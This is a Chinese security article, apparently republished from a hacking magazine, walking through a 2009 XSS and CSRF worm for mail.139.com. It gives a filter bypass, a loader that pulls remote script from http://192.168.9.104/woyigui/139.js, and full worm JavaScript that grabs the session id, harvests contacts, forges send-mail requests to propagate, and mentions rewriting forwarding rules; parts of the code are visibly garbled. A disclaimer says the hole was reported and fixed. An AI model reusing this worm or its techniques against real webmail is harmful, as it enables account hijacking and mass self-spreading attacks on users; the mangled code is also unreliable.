139邮箱蠕虫编写实例

安全 应用安全
我们经常会用到的mail.139.com,由于对邮件正文过滤不严,导致存在xss漏洞。他们尽管实现了对style="xss:expression"进行过滤,但是可以通过添加/* */绕过,如:。在添加/* */后,该脚本能够在IE浏览器执行

139邮箱蠕虫编写实例

Author:[sh0wrun],[woyigui]

Date:2009-09-09

声明:该漏洞已报告并已修复,切勿用于非法目的。

原理分析: 

我们经常会用到的mail.139.com,由于对邮件正文过滤不严,导致存在xss漏洞。他们尽管实现了对style="xss:expression"进行过滤,但是可以通过添加/*  */绕过,如:。在添加/* */后,该脚本能够在IE浏览器执行。
同时,经过分析发现,mail.139.com中发送邮件的功能存在CSRF弱点;可以通过Ajax技术获取发送邮件所需要的mid值。另外邮箱的“通信录“中的联系人邮件可以直接通过javascript取出。
满足了编写csrf worm的3个条件,接下来的工作,就是通过编写javascript代码来实现了。

跨站代码:

该部分要实现的功能就是,触发浏览器去读取远端的js脚本,并且执行该脚本:

Original:

var ig =document.createElement("script");ig.src="http://192.168.9.104/woyigui/139.js";try {document.getElementsByTagName("body")[0].appendChild(ig);} catch (e) {document.documentElement.appendChild(document.createElement("body"));document.getElementsByTagName("body")[0].appendChild(ig);}

对该部分编码按照10进制进行编码,以避免关键字被替换,并调用:

该部分代码,需放置在邮件正文中传送。

脚本功能的实现:

主要实现了如下功能:

1.通过脚本,读取联系人的邮箱地址。

该部分信息,可以通过top.LinkManList.concat()获取。

2.通过脚本,获取sid值

该部分信息,可以通过window.top.location.href,配合正则表达式获取到。

3.获取发送邮件所需要的mid值

在获取到sid值后,通过script打开"写邮件"页面,读取mid值。

4.发送邮件

发送邮件功能只验证mid值,因此在获取到正确的mid值后,连同获取到的联系人一起,构造post数据,发送邮件。
5.改写邮件转发规则和自动回复规则

在有正确的sid后,构造post。

完整代码:

var xssed = false; 
if (typeof XSSflag != "undefined"){ 
  xssed = true; 
} 
var XSSflag = [ 
  {name: "version", url: "1.0"}, 
]; 
if ( xssed != true ) {   
  var xmlhttp; 
  //create XHR 
  function createXMLHttp(){   
      try { 
        xmlhttp = new XMLHttpRequest(); 
      } catch (e) { 
         var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0', 
                     'MSXML2.XMLHTTP.4.0', 
                     'MSXML2.XMLHTTP.3.0', 
                     'MSXML2.XMLHTTP', 
                     'Microsoft.XMLHTTP' ); 
        var success = false; 
        for (var i=0;i < XMLHTTP_IDS.length && !success; i++) { 
          try { 
             xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]); 
              success = true; 
          } catch (e) {} 
        } 
        if (!success) { 
          throw new Error('Unable to create XMLHttpRequest.'); 
        } 
     } 
  } 
  function domid (dourl) { 
    createXMLHttp();   
    var tmp = ""; 
    xmlhttp.open("GET", dourl, false);   
    xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded;"); 
    xmlhttp.setRequestHeader("Connection", "close"); 
    xmlhttp.send(null); 
    setTimeout( tmp = xmlhttp.responseText,500); 
    return tmp;     
  } 
  function startRequest(doUrl, tomail, subject, Content, account, mid, sid ){   
    createXMLHttp();   
    var params = "funcid=compose&sid="+ sid +"&mid="+ mid +"&hidRemoteIp=&ishtml=y&optype=
send.x&idOpType=&text="+ Content +"&destcgi=
&funcid=compose&netfdrhost=&to="+ tomail +"&cc=&bcc=&subject="+ subject +"&year=
&month=&day=&hour=undefined&compinfo_minute=&chkHtmlMessage_text=y&chkHtmlMessage=y&ifsavetosent= 
   xmlhttp.setRequestHeader
("Content-Type","application/x-www-form-urlencoded;"); 
    y&account="+ account +"&destcgi=&netfdrhost=&split_rcpt=n&return_receipt=0&priority=0"; 
    
xmlhttp.open("POST", doUrl, false);   
xmlhttp.setRequestHeader("Content-length", params.length); 
    xmlhttp.setRequestHeader("Connection", "close"); 
    xmlhttp.send(params); 
  } 
  function doMyAjax()   
  {   
     var strPer = '/coremail/cgi/attachfapps'; 
     var tomail = ';'; 
     var subject = "test20"; 
     var Content = "";
     var account = ""; 
     var sid = window.top.location.href.replace(/.*&sid=(.*)/,"$1"); 
     var tmpmid = domid("/coremail/fcg/ldmmapp?funcid=compose&sid=" + sid );   
     var mid="",text=""; 
     text=tmpmid.split("\n"); 
    for (var i=0;i < text.length; i++) 
    { 
      var patt=/name=\"mid\" value=\"/; 
      if ( patt.test(text[i])) 
      {   
        mid=text[i].replace(/.*name=\"mid\" value=\"(.*)\".*/, "$1"); 
        break; 
      } 
    } 
    var mail_address=top.LinkManList.concat(); 
    for (var i=0,len=mail_address.length;i;"; 
      } 
    } 
     try { 
       startRequest(strPer, encodeURIComponent(tomail), encodeURIComponent(subject), 
encodeURIComponent(Content), encodeURIComponent(account), mid, sid );     
     } catch (e) { 
       alert("send data error!"); 
     } 
  } 
  doMyAjax(); 
} 

【编辑推荐】

  1. 深入了解网络中的蠕虫病毒
  2. Conficker蠕虫作者可随时引爆“网络核武器”
  3. 风暴蠕虫可能向安全人员实施报复性攻击
责任编辑:安泉 来源: 黑客防线
相关推荐

2015-07-20 10:27:50

DockerDockerfile创建实例

2020-04-03 10:14:57

内存蠕虫代码web安全

2011-04-06 09:39:49

mysql5存储

2020-03-30 17:43:13

开源开源项目编写文档

2022-01-07 06:12:08

RPC框架限流

2011-06-16 17:54:30

Qt Mplayer

2010-09-15 08:52:03

2011-07-05 17:54:43

QT Sqlite ARM

2016-09-02 09:14:26

2019-08-14 08:03:49

LinuxShell脚本web服务

2009-07-07 11:04:12

百变蠕虫病毒卡巴斯基

2014-05-14 13:13:59

2010-12-17 10:07:55

2009-07-07 22:52:21

2017-02-15 08:20:13

2020-05-16 12:06:32

微信公众平台Python开发

2009-12-30 15:26:02

Silverlight

2010-10-12 16:14:37

蠕虫病毒计算机安全

2014-06-20 11:13:11

2017-05-14 21:40:48

点赞
收藏

51CTO技术栈公众号